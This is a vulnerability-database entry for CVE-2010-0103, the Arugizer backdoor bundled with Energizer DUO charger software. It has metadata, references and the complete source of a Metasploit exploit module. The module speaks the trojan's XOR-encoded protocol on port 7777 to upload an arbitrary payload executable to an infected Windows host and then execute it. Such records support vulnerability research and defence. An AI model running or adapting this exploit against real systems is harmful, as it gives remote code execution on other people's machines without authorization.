ID

VAR-E-201003-0761


CVE

cve_id:CVE-2010-0103

Trust: 2.4

sources: BID: 38571 // PACKETSTORM: 87042 // EXPLOIT-DB: 16390 // EDBNET: 39083

EDB ID

16390


TITLE

Arugizer Trojan Horse (Energizer DUO) - Code Execution (Metasploit) - Windows remote Exploit

Trust: 0.6

sources: EXPLOIT-DB: 16390

DESCRIPTION

Arugizer Trojan Horse (Energizer DUO) - Code Execution (Metasploit). CVE-2010-0103CVE-62782 . remote exploit for Windows platform

Trust: 0.6

sources: EXPLOIT-DB: 16390

AFFECTED PRODUCTS

vendor:arugizermodel:trojan horsescope: - version: -

Trust: 1.0

vendor:energizermodel:duo trojanscope: - version: -

Trust: 0.5

vendor:energizermodel:duoscope:eqversion:0

Trust: 0.3

sources: BID: 38571 // PACKETSTORM: 87042 // EXPLOIT-DB: 16390

EXPLOIT

##
# $Id: energizer_duo_payload.rb 10389 2010-09-20 04:38:13Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::Tcp
include Msf::Exploit::EXE

def initialize(info = {})
super(update_info(info,
'Name' => 'Energizer DUO Trojan Code Execution',
'Description' => %q{
This module will execute an arbitrary payload against
any system infected with the Arugizer trojan horse. This
backdoor was shipped with the software package accompanying
the Energizer Duo USB battery charger.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 10389 $',
'References' =>
[
['CVE', '2010-0103'],
['OSVDB', '62782'],
['US-CERT-VU', '154421']
],
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', { } ],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Mar 05 2010'
))

register_options(
[
Opt::RPORT(7777),
], self.class)
end

def trojan_encode(str)
str.unpack("C*").map{|c| c ^ 0xE5}.pack("C*")
end

def trojan_command(cmd)
cid = ""

case cmd
when :exec
cid = "{8AF1C164-EBD6-4b2b-BC1F-64674E98A710}"
when :dir
cid = "{0174D2FC-7CB6-4a22-87C7-7BB72A32F19F}"
when :write
cid = "{98D958FC-D0A2-4f1c-B841-232AB357E7C8}"
when :read
cid = "{F6C43E1A-1551-4000-A483-C361969AEC41}"
when :nop
cid = "{783EACBF-EF8B-498e-A059-F0B5BD12641E}"
when :find
cid = "{EA7A2EB7-1E49-4d5f-B4D8-D6645B7440E3}"
when :yes
cid = "{E2AC5089-3820-43fe-8A4D-A7028FAD8C28}"
when :runonce
cid = "{384EBE2C-F9EA-4f6b-94EF-C9D2DA58FD13}"
when :delete
cid = "{4F4F0D88-E715-4b1f-B311-61E530C2C8FC}"
end

trojan_encode(
[cid.length + 1].pack("V") + cid + "\x00"
)
end

def exploit

nam = "C:\\" + Rex::Text.rand_text_alphanumeric(12) + ".exe" + "\x00"
exe = generate_payload_exe + "\x00"

print_status("Trying to upload #{nam}...")
connect

# Write file request
sock.put(trojan_command(:write))
sock.put(trojan_encode([nam.length].pack("V")))
sock.put(trojan_encode(nam))
sock.put(trojan_encode([exe.length].pack("V")))
sock.put(trojan_encode(exe))

# Required to prevent the server from spinning a loop
sock.put(trojan_command(:nop))

disconnect

#
# Execute the payload
#

print_status("Trying to execute #{nam}...")

connect

# Execute file request
sock.put(trojan_command(:exec))
sock.put(trojan_encode([nam.length].pack("V")))
sock.put(trojan_encode(nam))

# Required to prevent the server from spinning a loop
sock.put(trojan_command(:nop))

disconnect
end
end

Trust: 1.0

sources: EXPLOIT-DB: 16390

EXPLOIT LANGUAGE

rb

Trust: 0.6

sources: EXPLOIT-DB: 16390

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 16390

TYPE

Code Execution (Metasploit)

Trust: 1.0

sources: EXPLOIT-DB: 16390

TAGS

tag:Metasploit Framework (MSF)

Trust: 1.0

tag:exploit

Trust: 0.5

tag:arbitrary

Trust: 0.5

tag:trojan

Trust: 0.5

sources: PACKETSTORM: 87042 // EXPLOIT-DB: 16390

CREDITS

Metasploit

Trust: 0.6

sources: EXPLOIT-DB: 16390

EXTERNAL IDS

db:NVDid:CVE-2010-0103

Trust: 2.4

db:EXPLOIT-DBid:16390

Trust: 1.6

db:CERT/CCid:VU#154421

Trust: 1.4

db:0DAYTODAYid:9699

Trust: 0.6

db:EDBNETid:9702

Trust: 0.6

db:EDBNETid:39083

Trust: 0.6

db:PACKETSTORMid:87042

Trust: 0.5

db:BIDid:38571

Trust: 0.3

sources: BID: 38571 // PACKETSTORM: 87042 // EXPLOIT-DB: 16390 // EDBNET: 9702 // EDBNET: 39083

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2010-0103

Trust: 2.1

url:https://0day.today/exploits/9699

Trust: 0.6

url:https://www.exploit-db.com/exploits/16390/

Trust: 0.6

url:http://www.energizer.com/pages/default.aspx

Trust: 0.3

url:http://www.kb.cert.org/vuls/id/154421

Trust: 0.3

sources: BID: 38571 // PACKETSTORM: 87042 // EXPLOIT-DB: 16390 // EDBNET: 9702 // EDBNET: 39083

SOURCES

db:BIDid:38571
db:PACKETSTORMid:87042
db:EXPLOIT-DBid:16390
db:EDBNETid:9702
db:EDBNETid:39083

LAST UPDATE DATE

2022-07-27T09:59:23.676000+00:00


SOURCES UPDATE DATE

db:BIDid:38571date:2010-03-18T15:22:00

SOURCES RELEASE DATE

db:BIDid:38571date:2010-03-05T00:00:00
db:PACKETSTORMid:87042date:2010-03-09T22:50:14
db:EXPLOIT-DBid:16390date:2010-09-20T00:00:00
db:EDBNETid:9702date:2010-03-18T00:00:00
db:EDBNETid:39083date:2010-09-20T00:00:00